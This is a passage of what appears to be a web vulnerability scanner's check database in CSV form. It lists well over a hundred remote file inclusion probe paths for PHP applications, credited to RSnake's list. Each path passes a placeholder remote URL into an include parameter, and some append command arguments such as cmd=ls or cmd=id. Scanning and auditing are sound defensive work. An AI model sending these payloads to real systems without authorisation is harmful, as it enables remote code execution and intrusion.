(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004897\",\"5292\",\"c\",\"/include.php?sunPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004898\",\"5292\",\"c\",\"/include/Beautifier/Core.php?BEAUT_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004899\",\"5292\",\"c\",\"/include/HTML_oben.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004900\",\"5292\",\"c\",\"/include/HTML_oben.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004901\",\"5292\",\"c\",\"/include/SQuery/gameSpy2.php?libpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004902\",\"5292\",\"c\",\"/include/bbs.lib.inc.php?site_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004903\",\"5292\",\"c\",\"/include/class_yapbbcooker.php?cfgIncludeDirectory=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004904\",\"5292\",\"c\",\"/include/classes.php?INCLUDE_DIR=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004905\",\"5292\",\"c\",\"/include/client.php?INCLUDE_DIR=@RFIURL? \",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004906\",\"5292\",\"c\",\"/include/cls_headline_prod.php?INCLUDE_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004907\",\"5292\",\"c\",\"/include/cls_listorders.php?INCLUDE_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004908\",\"5292\",\"c\",\"/include/cls_viewpastorders.php?INCLUDE_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004909\",\"5292\",\"c\",\"/include/common.php?XOOPS_ROOT_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004910\",\"5292\",\"c\",\"/include/common_functions.php?baros_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004911\",\"5292\",\"c\",\"/include/config.inc.php?racine=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004912\",\"5292\",\"c\",\"/include/copyright.php?tsep_config[absPath]=@RFIURL?cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004913\",\"5292\",\"c\",\"/include/customize.php?l=@RFIURL&text=Hello%20World\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004914\",\"5292\",\"c\",\"/include/customize.php?l=@RFIURL&text=Hello%20World \",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004915\",\"5292\",\"c\",\"/include/default_header.php?script_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004916\",\"5292\",\"c\",\"/include/define.php?INC_DIR=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004917\",\"5292\",\"c\",\"/include/disp_form.php3?cfg_include_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004918\",\"5292\",\"c\",\"/include/disp_smileys.php3?cfg_include_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004919\",\"5292\",\"c\",\"/include/dom.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004920\",\"5292\",\"c\",\"/include/dtd.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004921\",\"5292\",\"c\",\"/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004922\",\"5292\",\"c\",\"/include/engine/content/elements/menu.php?CONFIG[AdminPath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004923\",\"5292\",\"c\",\"/include/forms.php?INCLUDE_DIR=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004924\",\"5292\",\"c\",\"/include/global.php?pfad=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004925\",\"5292\",\"c\",\"/include/header.php?cs_base_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004926\",\"5292\",\"c\",\"/include/html/nettools.popup.php?DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004927\",\"5292\",\"c\",\"/include/inc.foot.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004928\",\"5292\",\"c\",\"/include/inc_ext/spaw/dialogs/table.php?spaw_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004929\",\"5292\",\"c\",\"/include/inc_freigabe.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004930\",\"5292\",\"c\",\"/include/inc_freigabe.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004931\",\"5292\",\"c\",\"/include/inc_freigabe1.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004932\",\"5292\",\"c\",\"/include/inc_freigabe1.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004933\",\"5292\",\"c\",\"/include/inc_freigabe3.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004934\",\"5292\",\"c\",\"/include/inc_freigabe3.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004935\",\"5292\",\"c\",\"/include/include_stream.inc.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004936\",\"5292\",\"c\",\"/include/include_top.php?g_include=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004937\",\"5292\",\"c\",\"/include/includes.php?include_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004938\",\"5292\",\"c\",\"/include/index.php3?cfg_include_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004939\",\"5292\",\"c\",\"/include/init.inc.php?G_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004940\",\"5292\",\"c\",\"/include/issue_edit.php?INCLUDE_DIR=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004941\",\"5292\",\"c\",\"/include/lib/lib_slots.php?main_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004942\",\"5292\",\"c\",\"/include/lib/lib_stats.php?main_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004943\",\"5292\",\"c\",\"/include/lib/lib_users.php?main_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004944\",\"5292\",\"c\",\"/include/little_news.php3?cfg_include_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004945\",\"5292\",\"c\",\"/include/livre_include.php?no_connect=lol&chem_absolu=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004946\",\"5292\",\"c\",\"/include/loading.php?path_include=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004947\",\"5292\",\"c\",\"/include/mail.inc.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004948\",\"5292\",\"c\",\"/include/menu_builder.php?config[page_dir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004949\",\"5292\",\"c\",\"/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004950\",\"5292\",\"c\",\"/include/monitoring/engine/MakeXML.php?fileOreonConf=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004951\",\"5292\",\"c\",\"/include/parser.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004952\",\"5292\",\"c\",\"/include/pear/IT.php?basepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004953\",\"5292\",\"c\",\"/include/pear/IT.php?basepath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004954\",\"5292\",\"c\",\"/include/pear/ITX.php?basepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004955\",\"5292\",\"c\",\"/include/pear/ITX.php?basepath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004956\",\"5292\",\"c\",\"/include/pear/IT_Error.php?basepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004957\",\"5292\",\"c\",\"/include/pear/IT_Error.php?basepath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004958\",\"5292\",\"c\",\"/include/phpxd/phpXD.php?appconf[rootpath]=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004959\",\"5292\",\"c\",\"/include/prodler.class.php?sPath=@RFIURL???\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004960\",\"5292\",\"c\",\"/include/scripts/export_batch.inc.php?DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004961\",\"5292\",\"c\",\"/include/scripts/run_auto_suspend.cron.php?DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004962\",\"5292\",\"c\",\"/include/scripts/send_email_cache.php?DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004963\",\"5292\",\"c\",\"/include/startup.inc.php?root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004964\",\"5292\",\"c\",\"/include/themes/themefunc.php?myNewsConf[path][sys][index]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004965\",\"5292\",\"c\",\"/include/timesheet.php?config[include_dir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004966\",\"5292\",\"c\",\"/include/urights.php?CRM_inc=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004967\",\"5292\",\"c\",\"/includes/admin_board2.php?phpbb_root_path=@RFIURL?ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004968\",\"5292\",\"c\",\"/includes/admin_logger.php?phpbb_root_path=@RFIURL?ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004969\",\"5292\",\"c\",\"/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004970\",\"5292\",\"c\",\"/includes/ajax_listado.php?urlModulo=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004971\",\"5292\",\"c\",\"/includes/archive/archive_topic.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004972\",\"5292\",\"c\",\"/includes/archive/archive_topic.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004973\",\"5292\",\"c\",\"/includes/bbcb_mg.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004974\",\"5292\",\"c\",\"/includes/begin.inc.php?PagePrefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004975\",\"5292\",\"c\",\"/includes/blogger.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004976\",\"5292\",\"c\",\"/includes/class/class_tpl.php?cache_file=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004977\",\"5292\",\"c\",\"/includes/class_template.php?quezza_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004978\",\"5292\",\"c\",\"/includes/classes/pctemplate.php?pcConfig[smartyPath]=@RFIURL?cmd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004979\",\"5292\",\"c\",\"/includes/common.inc.php?CONFIG[BASE_PATH]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004980\",\"5292\",\"c\",\"/includes/common.php?module_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004981\",\"5292\",\"c\",\"/includes/common.php?root=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004982\",\"5292\",\"c\",\"/includes/common.php?root=@RFIURL??\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004983\",\"5292\",\"c\",\"/includes/common.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004984\",\"5292\",\"c\",\"/includes/common.php?root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004985\",\"5292\",\"c\",\"/includes/config.inc.php?racineTBS=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004986\",\"5292\",\"c\",\"/includes/config/master.inc.php?fm_data[root]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004987\",\"5292\",\"c\",\"/includes/config/master.inc.php?fm_data[root]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004988\",\"5292\",\"c\",\"/includes/connection.inc.php?PagePrefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004989\",\"5292\",\"c\",\"/includes/dbal.php?eqdkp_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004990\",\"5292\",\"c\",\"/includes/events.inc.php?PagePrefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004991\",\"5292\",\"c\",\"/includes/footer.html.inc.php?tc_config[app_root]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004992\",\"5292\",\"c\",\"/includes/footer.inc.php?PagePrefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004993\",\"5292\",\"c\",\"/includes/footer.php?PHPGREETZ_INCLUDE_DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004994\",\"5292\",\"c\",\"/includes/functions.inc.php?sitepath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004995\",\"5292\",\"c\",\"/includes/functions.php?location=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004996\",\"5292\",\"c\",\"/includes/functions.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004997\",\"5292\",\"c\",\"/includes/functions.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004998\",\"5292\",\"c\",\"/includes/functions/auto_email_notify.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004999\",\"5292\",\"c\",\"/includes/functions/html_generate.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005000\",\"5292\",\"c\",\"/includes/functions/master.inc.php?fm_data[root]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005001\",\"5292\",\"c\",\"/includes/functions/master.inc.php?fm_data[root]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005002\",\"5292\",\"c\",\"/includes/functions/validations.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005003\",\"5292\",\"c\",\"/includes/functions_admin.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005004\",\"5292\",\"c\",\"/includes/functions_install.php?vwar_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005005\",\"5292\",\"c\",\"/includes/functions_kb.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005006\",\"5292\",\"c\",\"/includes/functions_kb.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005007\",\"5292\",\"c\",\"/includes/functions_mod_user.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005008\",\"5292\",\"c\",\"/includes/functions_portal.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005009\",\"5292\",\"c\",\"/includes/functions_portal.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005010\",\"5292\",\"c\",\"/includes/functions_user_viewed_posts.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005011\",\"5292\",\"c\",\"/includes/global.php?nbs=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005012\",\"5292\",\"c\",\"/includes/header.inc.php?PagePrefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005013\",\"5292\",\"c\",\"/includes/header.inc.php?dateiPfad=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005014\",\"5292\",\"c\",\"/includes/include_once.php?include_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 